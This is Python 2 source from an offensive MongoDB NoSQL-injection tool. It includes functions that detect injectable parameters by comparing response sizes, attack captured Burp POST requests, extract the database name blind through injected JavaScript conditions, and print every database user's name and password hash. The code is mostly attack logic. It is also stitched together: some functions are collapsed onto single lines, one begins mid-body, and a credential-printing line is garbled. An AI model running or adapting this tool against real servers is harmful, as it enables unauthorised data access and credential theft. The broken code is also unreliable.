def checkResult(baseSize, injectSize, testNum, postData): global validAddrs #有效 global possAddrs global httpMethod global neDict global gtDict delta = abs(baseSize - injectSize) if (delta >= 100) and (injectSize != 0): printInfoMsg( '[*] Response varied %s bytes from random parameter value! Injection works!' % delta) if httpMethod == 'GET': validAddrs.append(urlArray[testNum]) else: if testNum == 1: validAddrs.append(str(neDict)) elif testNum == 2: validAddrs.append(str(gtDict)) else: validAddrs.append(str(postData)) if testNum == 2 or testNum == 4: lt24 = True str24 = True elif testNum == 3 or testNum == 5: lt24 = True int24 = True return elif (delta < 100) and (delta > 0) and (injectSize != 0): print '[*] Response variance was only %s bytes. Injection returned a MongoDB Error. Injection may be possible.' % delta if httpMethod == 'GET': possAddrs.append(urlArray[testNum]) else: if testNum == 1: possAddrs.append(str(neDict)) else: possAddrs.append(str(postData)) return elif delta == 0: print '[*] Injection did not work.' return else: print '[*] Injected response was smaller than random response. Injection may be possible.' if httpMethod == 'GET': possAddrs.append(urlArray[testNum]) else: if testNum == 1: possAddrs.append(str(neDict)) else: possAddrs.append(str(postData)) return
def displayDBS(conn):
    """Print the databases, their collections and any entries of ``system.users``.

    Args:
        conn: An open MongoDB client exposing ``database_names()``; each
            database is read via ``conn[dbname]`` for ``collection_names()``
            and ``system.users``.
    """
    try:
        printInfoMsg('[+] List of databases:')
        for db in conn.database_names():
            print ' %s' % db
        print '\n'
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt/SystemExit
        # and hides the cause; ``except Exception, e`` with ``e`` in the
        # message would match the handlers below.
        printErrMsg('[Error] Couldn\'t list databases.')
    try:
        for dbname in conn.database_names():
            db = conn[dbname]
            printInfoMsg('[+] DBname: %s' % dbname)
            colls = db.collection_names(include_system_collections=False)
            printInfoMsg('[+] %s Collections:' % dbname)
            for coll in colls:
                print ' %s' % coll
            print '\n'
            # System collections were filtered out above, so a second,
            # unfiltered listing is needed to detect ``system.users``.
            if 'system.users' in db.collection_names():
                users = list(db.system.users.find())
                printInfoMsg('[+] Database User and Password hash:')
                try:
                    for x in range(0, len(users)):
                        # Credential hashes go to stdout here; treat the
                        # tool's output as sensitive and keep it out of
                        # shared logs.
                        # NOTE(review): the username expression on this line
                        # is garbled in this copy and is not valid Python.
                        print " Username: "******" Hash: " + users[x]['pwd']
                    print "\n"
                except Exception, e:
                    printErrMsg('[Error] %s, couldn\'t list user or hash\n' % e)
                    continue
    except Exception, e:
        printErrMsg('[Error] %s, Couldn\'t list collections.\n' % e)
def getDBInfo():
    """Recover the current database name from response-length differences.

    Substitutes a JavaScript condition for the ``---`` marker in the
    module-level ``urlArray[11]`` and treats a response whose length equals
    the baseline length as a positive answer.  First the name length is
    found, then one character at a time from ``string.ascii_letters +
    string.digits``; the name is printed as it is built up.  Uses the
    module-level ``urlArray``, ``HEADERS``, ``requests`` and ``string``.
    """
    getDBnameLen = False
    getDBname = False
    DBnameLen = 0
    nameCount = 0
    charCount = 0
    dbName = ''
    chars = string.ascii_letters + string.digits
    # NOTE(review): ``trueUrl`` is built but never used; the baseline below is
    # taken from the unmodified ``urlArray[11]``.
    trueUrl = urlArray[11].replace("---", "return true; var v ='!" + "&")
    req = requests.get(urlArray[11], headers=HEADERS)
    baseLen = int(len(req.content))
    print '[*] Calculating the length of the database name.'
    # NOTE(review): no upper bound; if no candidate length ever matches
    # ``baseLen`` this loop never terminates.
    while getDBnameLen == False:
        calcUrl = urlArray[11].replace(
            "---", "if(db.getName().length==%s) {return true;} var v='a&" % DBnameLen)
        # Only the baseline request above sends HEADERS; the probes do not.
        req = requests.get(calcUrl)
        UrlLen = int(len(req.content))
        if UrlLen == baseLen:
            print '[*] Got database name length of %s characters.' % DBnameLen
            getDBnameLen = True
        else:
            DBnameLen += 1
    # The trailing comma makes this a tuple expression, not a print-style
    # newline suppression; the call still prints normally.
    printInfoMsg('[+] Database name is: '),
    while getDBname == False:
        calcUrl = urlArray[11].replace(
            "---", "if(db.getName()[%s]==chars[%s]){return true;} var v='a&" % (nameCount, charCount))
        req = requests.get(calcUrl)
        UrlLen = int(len(req.content))
        if UrlLen == baseLen:
            dbName += chars[charCount]
            print dbName,
            nameCount += 1
            charCount = 0
            if nameCount == DBnameLen:
                getDBname = True
        else:
            # NOTE(review): ``charCount`` is not bounded by ``len(chars)``; a
            # character outside ``chars`` ends in an IndexError above.
            charCount += 1
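def postWeb(reqFile):
    """Run the POST-based checks against the request captured in ``reqFile``.

    Resets the module-level result state (``testNum``, ``httpMethod``,
    ``possAddrs``, ``validAddrs``, ``addedTarget``, ``paramNames``,
    ``paramValues``), reads the request file, hands it to ``parseBurpLog`` to
    fill ``addedTarget``, runs ``buildPostdata`` on the parsed url/data and
    finally prints the valid and possible entries collected.

    Args:
        reqFile: Path of the captured request file; ``checkFile`` validates it
            before it is opened.

    Returns:
        None.  Errors are reported via ``printErrMsg`` and abort the run.
    """
    print '[*] Start web app attacks (POST)'
    global testNum
    testNum = 1
    global httpMethod
    httpMethod = 'POST'
    global possAddrs
    possAddrs = []
    global validAddrs
    validAddrs = []
    global addedTarget
    addedTarget = dict()
    global paramNames
    paramNames = []
    global paramValues
    paramValues = []
    # The original also set appUp/strAttack/intAttack locals that were never
    # read; they have been dropped.
    checkFile(reqFile)
    try:
        with openFile(reqFile, 'rb') as f:
            content = f.read()
    except Exception, e:
        # Narrowed from a bare except so Ctrl-C is not swallowed; the cause is
        # reported alongside the original message.
        printErrMsg(
            '[Error] Something went wrong while trying to read the content of file \'%s\'' % reqFile)
        printErrMsg('[Error] %s' % e)
        return
    parseBurpLog(content)
    # .get() so a request file that yields neither key reports the friendly
    # error below instead of raising KeyError.
    if not addedTarget.get('url') or not addedTarget.get('data'):
        printErrMsg(
            '[Error] Unable to find usable request(s), in provided file (\'%s\')' % reqFile)
        return
    print '[*] Testing connection to the target URL.'
    url = addedTarget['url']
    buildPostdata(url, addedTarget['data'])
    printInfoMsg('[+] Valid URLs:')
    for addr in validAddrs:
        printInfoMsg(' %s' % addr)
    print '\n '
    printInfoMsg('[+] Possible URLs:')
    for addr in possAddrs:
        printInfoMsg(' %s' % addr)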
def buildUrl(url, value):
    """Split the query string of ``url`` and ask which parameters to inject.

    Resets the module-level ``urlArray`` to twelve empty slots, lists the
    parameter names found after ``?`` and reads a comma-separated selection
    via ``getQuesMsg``.  In this copy the selected ``injectParams`` and the
    ``urlArray`` slots are set up but not used further; the function appears
    to be truncated here.

    Args:
        url: Target URL whose ``?name=value&...`` query string is parsed.
        value: Unused in the visible part of the function.
    """
    global urlArray
    urlArray = ['', '', '', '', '', '', '', '', '', '', '', '']
    paramNames = []
    paramValues = []
    injectParams = []
    try:
        split_url = url.split('?')
        params = split_url[1].split('&')
    except:
        # NOTE(review): bare except; the IndexError from a missing '?' is the
        # case this handles.
        printErrMsg(
            '[Error] Not able to parse the URL and parameters. Check the url')
        return
    for item in params:
        # NOTE(review): when '=' is absent find() returns -1, so the name
        # loses its last character and the value becomes the whole item;
        # ``item.partition('=')`` would avoid that.
        index = item.find('=')
        paramNames.append(item[0:index])
        paramValues.append(item[index + 1:len(item)])
    printInfoMsg('[+] List of parameters:')
    index = 1
    for name in paramNames:
        print ' [%s] %s' % (index, name)
        index += 1
    try:
        injectIndex = getQuesMsg(
            '[*] Choose parmeters to inject (such as 1,2,3):')
        #print injectIndex.split(',')
        # Selection is 1-based as displayed above.
        for i in injectIndex.split(','):
            injectParams.append(paramNames[int(i) - 1])
    except Exception, e:
        printErrMsg('[Error] %s. Somthing wrong... Check inject parmeters.' % e)
        return
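def displayInfo(conn):
    """Print the version, debug flag and word size reported by the server.

    Args:
        conn: MongoDB client exposing ``server_info()``; the ``'version'``,
            ``'debug'`` and ``'bits'`` keys of its result are printed.
    """
    printInfoMsg('[+] Server Info:')
    # One round-trip instead of three: the original called server_info()
    # once per printed line.
    info = conn.server_info()
    print ' MongoDB Version:', info['version']
    print ' Debugs enabled:', str(info['debug'])
    print ' Platform:', str(info['bits']) + ' bits'
    print '\n'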
reqTime = round((end - start), 3) print '[*] App is up, got response length of %s' % resLength else: printErrMsg('[Error] Got %s from the app, check your options.' % req.status_code) return except Exception, e: printErrMsg( '[Error] %s. Looks like the server didn\'t respond. Check your options.' % e) return if appUp == True: index = 1 printInfoMsg('[+] List of post params:') for params in postParams: print ' [%s] %s' % (index, params) index += 1 try: injectIndex = getQuesMsg('Choose a parmeter to inject: ') injOpt = postParams.keys()[int(injectIndex) - 1] except Exception, e: printErrMsg( '[Error] %s. Somthing wrong... Check inject parmeters.' % e) return injectSize = getQuesMsg('[*] Input test random string size: ') injectstr = getInjectStr(int(injectSize)) postParams[injOpt] = injectstr req = requests.post(url, data=postParams, headers=HEADERS)